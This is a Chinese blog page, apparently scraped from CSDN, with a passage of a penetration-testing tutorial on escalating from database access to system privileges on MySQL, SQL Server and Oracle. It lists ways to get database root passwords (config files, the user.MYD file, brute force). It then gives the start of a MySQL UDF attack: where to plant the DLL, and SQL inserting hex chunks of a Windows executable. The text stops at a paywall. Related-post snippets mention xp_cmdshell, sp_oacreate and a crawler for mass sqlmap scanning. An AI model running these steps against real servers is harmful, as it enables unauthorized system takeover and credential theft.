权限提升-MY&MS&ORA等SQL数据库的提权

最新推荐文章于 2023-06-22 22:54:57 发布
最新推荐文章于 2023-06-22 22:54:57 发布
阅读量314 收藏
点赞数
分类专栏: web安全 文章标签: web 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46425310/article/details/119334874
版权
本文介绍了在权限提升过程中,针对MY(MySQL)、MS(Microsoft SQL Server)和ORA(Oracle)等SQL数据库的提权方法。包括利用UDF、MOF、启动项和反弹shell等方式进行提权,并详细阐述了每个步骤和所需的前提条件。对于MySQL,提权可通过创建自定义函数sys_eval和利用MOF文件。在MS SQL Server中,可以启用xp_cmdshell或使用SP_OACreate。Oracle数据库由于常与jsp结合,提权通常无需额外操作。
摘要由CSDN通过智能技术生成

权限提升-MY&MS&ORA等SQL数据库的提权

再利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件;服务器开启数据库服务以及能获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。
步骤:1.探针 2.收集 3.分类
探针:扫描不同数据库对应的特定端口;探测哪些服务开启
收集:权限密码的获取通过配置文件,存储文件,暴力猜解
分类:MySQL:UDF MOF 启动项 反弹shell
UDF提权(基于MySQL调用命令执行函数)
MySQL最高权限用户名为root,读取配置文件获取数据库密码;读取数据库存储或备份文件(MySQL下data文件夹里包含了各个表名,列名,以文件夹的形式储存,.MYD文件打开就是表里的内容,因为MySQL账号密码默认储存在mysql库中的user表,所以可以打开data/mysql/user.MYD),或者用MySQL爆破脚本。
当 MySQL< 5.1 版本时,将 .dll 文件导入到 c:\windows 或者 c:\windows\system32 目录下。
当 MySQL> 5.1 版本时,将 .dll 文件导入到 MySQL Server 5.xx\lib\plugin 目录下 (lib\plugin目录默认不存在,需自行创建)。

create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
sel

最低0.47元/天 解锁文章
je1emy0uan
关注
专栏目录
提权-MY&MS&ORA数据库提权
qi_SJQ_的博客
02-01 1583
数据库提权: 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权来获得系统权限,不是提升数据库用户的权限,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库提权的可能。 #数据库应用提权权限提升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库提权权限用户密码收集等方法 #目前数据库提权对应的技术及方法等 提权流程:服务探针->信息收集->提权利用->获取权限 探针查看是否...
权限提升-MY&MS&ORASQL数据库提权
weixin_44805159的博客
10-12 332
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。 #数据库应用提权权限提升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等 Mysql的密码:select * from mysql.user;#案例1.MYSQL数据库提权演示-脚本&MSF**流程:服务探针-信息收集-提权利用-获取
第99天:权限提升-数据库提权&口令获取&MYSQL&MSSQL&Oracle&MSF
最新发布
qq_46081990的博客
06-22 548
【代码】第99天:权限提升-数据库提权&口令获取&MYSQL&MSSQL&Oracle&MSF。
mysql笔记—权限问题,授权 给 root 所有sql 权限
qq_36372714的博客
05-07 2390
mysql笔记—权限问题,授权 给 root 所有sql 权限 1.创建用户(无论有无root用户都需要再创建一次,否则无法执行赋权语句) CREATE USER 'root' IDENTIFIED BY '密码'; 2.赋予所有权限 GRANT ALL privileges ON *.* TO `root`@`%` WITH GRANT OPTION; ......
第60天-权限提升-MY&MS&ORASQL 数据库提权
MCTSOG的博客
05-04 655
思维导图 权限提升 数据库提权 ​ 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。 数据库应用提权权限提升中的意义 WEB 或本地环境如何探针数据库应用 数据库提权权限用户密码收集等方法 目前数据库提权对应的技术及方法等 知识点 提权流程 服务探针---->信息收集----->提权利用----->获取权限 数据库端口号 关系型数
第60天:权限提升-MY&MS&ORASQL数据库提权1
08-03
本篇文章将详细讲解如何针对MY&MS&ORASQL数据库进行提权,以及涉及的相关知识点。 首先,我们要明白数据库提权的基本前提:服务器上必须运行着数据库服务,并且攻击者需要掌握最高权限用户的密码。对于非Access...
oracle数据库连接拒绝,Oracle 数据库连接失败问题
weixin_35130354的博客
04-06 5666
Oracle 数据库连接失败问题Oracle 数据库连接失败问题为什么80%的码农都做不了架构师?>>>环境上安装的是oracle11g,其实oracle的安装是比较容易的,winA装server, winB装client, 最终目的winA能连上winB,并能查询数据和操作,但是由于我的环境装了两个数据库server, 一个监听1521, 一个监听1522,而客户端只有一个,长...
升级11.1.0.7后启动数据库报错error 27103
zzwssfd
12-10 276
感谢:http://www.dbsupport.cn/thread-372-1-1.html   升级到11.1.0.7.12启动数据库报错: OS版本:suse linux X86-64 DB版本:11.1.0.7.8 升级到11.1.0.7.12   Total System Global Area 1.2560E+10 bytes Fixed Size           ...
SQL Server提权方法汇总(MSSQL
bjdsmcxm0018的博客
06-21 770
使用sp_oacreate进行提权--提权语句--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1EXEC sp_configure 'show advanced options', 1; --使前面的配置生效RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1...
【原创】oracle提权执行命令工具oracleShell v0.1
weixin_33963594的博客
11-30 424
帮一个兄弟渗透的过程中在内网搜集到了不少oracle连接密码,oracle这么一款强大的数据库,找了一圈发现没有一个方便的工具可以直接通过用户名密码来提权的。想起来自己之前写过一个oracle的连接工具,拿出来分享下。工具没有用到什么新的技术,希望能给做渗透测试的兄弟们节省一点时间。 支持三种工作模式: 1.普通模式:   前提是拥有一个普通的oracle连接账号,不需要DBA权限,可...
python实现爬取包含特定内容的URL 配合sqlmap实现批量扫描sql注入
weixin_46425310的博客
08-03 1194
# coding: utf-8 import requests, re, threading import time from bs4 import BeautifulSoup as bs from queue import Queue from argparse import ArgumentParser arg = ArgumentParser(description='baidu_url_collection') arg.add_argument('-keyword', help='inurl:.a
into dumpfile() into outfile() load_file()
weixin_46425310的博客
06-11 879
MySQL注入 在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 * into dumpfile() * into outfile() * load_file() * 读写文件函数调用的限制 * 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 * * 翻译一下就是 * 其中当参数 secure_file_priv 为空时,
web安全之常见加密编码算法
weixin_46425310的博客
06-11 815
加密算法 在渗透测试中,常见的密码等敏感信息会被采用加密处理,因此很有必要了解常用的加密方式以及编码知识。 常见加密编码算法解析: MD5, SHA ,ASC ,URL ,BASE64 ,Unescape ,AES ,DES,进制,时间戳,unicode等 大部分网站采用MD5(不可逆):16位MD5(加密后长度为16位)与32位MD5 MD5 是非对称的加密算法 密文是0-9 a-z的组合 SHA:0-9 a-z的组合 Unicode:形如flag{18 时间戳:网站在记录注册时间,登陆时间等的时候,往往
WEB漏洞-文件上传之后端黑白名单绕过
weixin_46425310的博客
06-11 714
WEB漏洞-文件上传之后端黑白名单绕过 文件上传常见验证:后缀名,类型,文件头 后缀名:黑名单,白名单 黑名单:asp php jsp aspx cgi war… 白名单: txt jpg zip rar gif… 类型:MIME信息 文件头:内容头信息 平台配置文件可能开启了以php解析php3,phtml,php5后缀,所以黑名单中如果疏漏了这些后缀,就可以绕过。(特殊解析后缀) .htaccess(apache服务器中的一个配置文件)可以通过先上传一个.htaccess文件 <FilesM
web漏洞-XSS跨站之代码及httponly绕过
weixin_46425310的博客
06-17 638
web漏洞-XSS跨站之代码及httponly绕过 httponly:设置后将使得通过js脚本无法读取到cookie PHP中设置:<?php ini_set(“session.cookie_httponly”,1); ?> 因为进入后台有通过cookie或通过账户密码,禁止js读取cookie,可以通过获取账号密码来登录后台。 获取账号密码: 保存读取:浏览器已经保存过之前登陆的账户密码,可以通过xss来获取保存的明文密码 未保存读取:采用表单劫持,必须在登录框页面写入xss跨站脚本 xss练
web渗透预备知识之浏览器代理,数据包,http
weixin_46425310的博客
06-11 629
**浏览器->request->proxy(代理服务器)->web server->response->proxy->**浏览器 http、https: http:明文的 http、tcp、IP HTTPS:带加密协议的HTTP、SSL OR TLS 、TCP、IP https下浏览器和服务器进行加密通信的过程: client发送https请求给server,server响应给client,client证书校验,生成密码,公钥加密然后发送加密信息给server,serve
SQL数据库提权实战:UDF、MOF与启动项利用
网络安全领域,权限提升-MY&MS&ORASQL数据库提权是一个重要的技术手段,特别是在遇到传统系统溢出漏洞无法利用的情况时。本文将深入探讨几种在数据库环境中进行提权的方法,包括: 1. **UDF提权**: - 基于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值